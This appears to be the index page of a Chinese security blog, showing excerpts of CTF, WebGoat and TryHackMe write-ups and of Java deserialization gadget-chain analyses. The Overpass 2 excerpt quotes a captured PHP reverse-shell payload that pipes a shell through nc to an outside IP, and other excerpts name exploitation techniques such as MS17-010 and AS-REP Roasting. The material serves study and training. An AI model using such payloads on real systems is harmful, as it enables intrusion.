ccb&ciscn线下半决赛 - wp
ccb&ciscn线下半决赛 有幸拿到一等奖 awdpphp-master 导入 12345# docker 导入docker load -i xxx.tar# 不知道端口的情况下运行该镜像docker run -it <images> /bin/bash 查看运行端口,发现就是80,那就可以用以下命令运行docker 123docker run -d -p 4545:80 <images> # 进入容器docker exec -it <container> /bin/bash 在容器中找到index.php 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687<?php@error_reporting(E_ALL);if...
webGoat打靶日记
webGoat打靶日记前言 只是单纯打靶场的可以直接使用docker部署,如果目的是代码审计的话,环境搭建参考drun1baby师傅的blog:一文解决搭建WebGoat的所有问题 | Drunkbaby’s Blog (drun1baby.top) 使用docker部署拉取镜像 1234docker search webgoat docker pull webgoat/webgoat-8.0:v8.1.0 docker pull webgoat/webwolf:v8.1.0 docker pull webgoat/goatandwolf:v8.1.0 运行容器 1docker run -d -p 8888:8888 -p 8081:8080 -p 9090:9090...
Commons Collections 3 分析
Commons Collections 3 分析 CC3这条链子的思路是用了我们一开始学的java的类的动态加载,如果我们的链子总是依赖ChainedTransformer的transform方法,利用反射将多个Invoketranfoemer来进行的执行命令这样的思路,要是Invoketranfoemer类进入了黑名单,这样整条链子就不能用了。 为了摆脱这样的限制,CC3链子的这种思路就应运而生了。 环境 12Commons Collections3.2.1jdkjdk8u231 Maven 依赖示例: 1234567<dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.2.1</version> ...
Commons Collections 6 分析
Commons Collections 6 CC6 链不受 JDK 版本限制,只要使用的 commons-collections 版本 ≤ 3.2.1,就存在这条利用链。触发点仍然是熟悉的 InvokerTransformer.transform,但利用路径与 CC1 有所不同。 CC6 链不受 jdk 版本制约,只要commons collections 小于等于3.2.1,都存在这个漏洞。 环境 12Commons Collections3.2.1jdkjdk8u71 Maven 依赖示例: 1234567<dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.2.1</version> ...
Commons Collections 1分析
Commons Collections 1分析环境依赖 1234Apache Commons Collections 3.0 - 4.0后续在 3.2.2/4.1 版本做了修复TransformedMap - jdk < 8u71 1234567<dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.2.1</version> </dependency></dependencies> 前置知识AbstractMapDecorator首先 CC 库中提供了一个抽象类 org.apache.commons.collections.map.AbstractMapDecorator,这个类是 Map...
URLDNS链
URLDNS链前言 项目地址:ysoserial/src/main/java/ysoserial/payloads/URLDNS.java at master · frohoff/ysoserial (github.com) URLDNS是ysoserial中的一条利用链,通常用于检测是否存在Java反序列化漏洞,特点: 只能发起dns请求,不能进行其他利用 目标无回显 使⽤用Java内置的类构造,对第三⽅方库没有依赖 原理分析 官方给的Gadget Chain: 1234* HashMap.readObject()* HashMap.putVal()* HashMap.hash()* URL.hashCode() 我们正着来走一遍先跟进HashMap类,是一个可序列化的类,其重写了readObject()方法,然后通过一个for循环K key = (K)...
2022网鼎杯决赛内网靶场复现
2022网鼎杯决赛内网靶场复现工具 目录扫描工具[[dirsreach]],[[gobuster]] , antsword,godzilla,[[fscan]],[[WPScan]],[[chisel]],[[frp]],[[Proxifier]] , [[msf]],[[WMIexec]],rdp是什么,[[CrackMapExec]] 复现 靶标介绍:该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。 考点: wordpress插件rce MS17-010 AS-REP Roasting 基于资源的约束性委派 智能卡身份验证出错下的CVE-2022–26923 AD域提权打法——Schannel传递证书传递到LDAPS,修改LDAP配置RBCD 渗透的过程 外网打点 ->...
THM - Offensive Pentesting - Section2 - Relevant
THM - Offensive Pentesting - Section2 - Relevant 您已被指派给一位客户,该客户希望对七天内将要发布到生产环境中进行渗透测试。 工作范围 客户要求工程师对提供的虚拟环境进行评估。客户要求提供关于评估的最低限度的信息,希望从恶意行为者的角度进行评估(黑盒渗透测试)。客户要求您获取两个 flag(未提供位置)作为漏洞利用的证据: 用户.txt 根.txt 此外,客户还提供了以下范围许可: 本次活动允许使用任何工具或技术,但我们要求您首先尝试手动利用 找到并记录发现的所有漏洞 将发现的标志提交到仪表板 只有分配给您的机器的 IP 地址在范围内 查找并报告所有漏洞(是的,根路径不止一条) (角色扮演关闭) 我鼓励你把这次挑战当成一次真正的渗透测试来对待。你可以考虑写一份报告,其中包含执行摘要、漏洞和利用评估以及补救建议,这将有助于你准备 eLearnSecurity 认证专业渗透测试员,或成为一名渗透测试员。注意 - 此房间内的任何内容都不需要Metasploit 机器可能需要最多 5...
THM - Offensive Pentesting - Section2 - Overpass 2 - Hacked
Overpass 2 - Hacked Overpass 被黑了!SOC团队(Paradox,恭喜升级)在深夜值班时查看 shibes 时发现了可疑活动,并成功捕获了攻击发生时的数据包。 您能弄清楚攻击者是如何入侵的,并重新入侵 Overpass 的生产服务器吗? 他们用来上传反向 shell 的页面 URL 是什么?流量包中可以看到是development payload 1<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> 密码在tcp流3中 发现使用了ssh-backdoor 1git clone...
THM - Offensive Pentesting - Section2 - Skynet
Skynet 外网打点nmap扫描报告12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849nmap -sV -sC -p- --min-rate 10000 10.10.220.42Starting Nmap 7.80 ( https://nmap.org ) at 2025-04-14 03:50 EDTWarning: 10.10.220.42 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.220.42Host is up (0.23s latency).Not shown: 51285 closed ports, 14244 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8...
